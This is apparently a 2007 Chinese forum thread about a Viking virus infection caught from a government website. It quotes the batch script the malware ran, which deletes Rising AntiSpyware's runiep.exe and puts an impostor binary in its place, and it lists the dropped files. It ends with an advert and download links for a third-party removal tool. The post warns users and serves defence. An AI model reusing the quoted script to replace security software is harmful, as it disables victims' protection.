打开一个带VIKING病毒的政府网站时中毒，它运行了以下BAT文件：

:try1
Del "C:\Program Files\Rising\AntiSpyware\runiep.exe"
if exist "C:\Program Files\Rising\AntiSpyware\runiep.exe" goto try1
ren "C:\Program Files\Rising\AntiSpyware\runiep.exe.exe" "runiep.exe"
if exist "C:\Program Files\Rising\AntiSpyware\runiep.exe.exe" goto try2
"C:\Program Files\Rising\AntiSpyware\runiep.exe"
:try2
del "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a1A.bat"

结果是反复在WINDOWS目录中产生logo_.exe并建立一个文件夹uninstall内有runduL132.exe，还在IE目录中建立多个sy12.exe,.......,目前SY13。EXE和SY19。EXE瑞星尚不能杀除。

那个runiep.exe.exe可惜未抓到样品。。

本文发表于07-6-11,目的只是提醒大家：1、病毒越来越疯狂；2、实在找不到问题所在时不妨怀疑一下你最信任的--比如瑞星、卡卡，等等，是不是被病毒替换了。本文中所说的这个替代品只是在“驱动”里隐藏了自己，其他功能还真和卡卡一样的，好笑而且可怕啊。

威金 而已
用威金专杀

那么也是新的VIKING了，因为上周五杀毒软件还什么都不能报出，而刚才已杀出成300个感染各个盘EXE的威金。

放在回收站的好多都已消失，sy13.exe,sy19.exe还在。

  【凝逸反毒】清除:杀软不杀的病毒,修复:感染威金,熊猫,Virus.Win32.Delf.bl的exe;
[扫描病毒]
    清除:灰鸽子,威金,熊猫,金猪,U盘病毒等;
    修复:感染威金,熊猫,Virus.Win32.Delf.bl的exe;   
[分析感染PE]
    分析PE(exe),修复威金,熊猫等未知变种感染的PE;
[修复感染EXE]
  自已提取样本,修复感染EXE
[清除网页病毒]
    清除网页病毒代码与病毒网址


下载
新版:http://nyfd.n-cn.com/download/nyfd.zip
http://hi.baidu.com/503165656
http://www.skycn.com/soft/32883.html

【凝逸实验室】
                      作者:凝逸
主站:http://hi.baidu.com/503165656
凝逸软件:http://503165656.ys168.com
技术支持QQ:503165656
反病毒TM群:24874517